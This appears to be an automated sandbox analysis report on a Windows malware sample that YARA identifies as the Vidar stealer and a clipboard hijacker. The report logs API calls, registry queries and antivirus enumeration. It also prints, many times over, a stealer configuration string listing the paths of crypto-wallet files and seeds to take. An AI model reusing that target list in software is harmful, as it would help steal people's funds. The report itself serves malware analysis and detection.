Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

1_2_00419F90

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_05E580F6 cpuid

0_2_05E580F6

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_05E70AB6
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_05E30AB6
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	4_2_00438178
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00440116
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_004382A2
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	4_2_0043834F
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	4_2_00438423
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: EnumSystemLocalesW,	4_2_004387C8
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: GetLocaleInfoW,	4_2_0043884E
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	4_2_00437BB3
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: EnumSystemLocalesW,	4_2_00437E27
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	4_2_00437E83
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	4_2_00437F00
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	4_2_00437F83

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 0_2_00408AF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00408AF4

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

1_2_00419F90

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0042FE47

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

1_2_00419F90

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 25.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mstsca.exe.24215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.build3.exe.23215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3442731774.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4155293453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2211706428.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2792359253.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2042545624.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4018136465.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1939815597.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.build2.exe.36715a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.build2.exe.36715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build2.exe PID: 6264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 7036, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\ElectronCash\wallets\\.o
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger 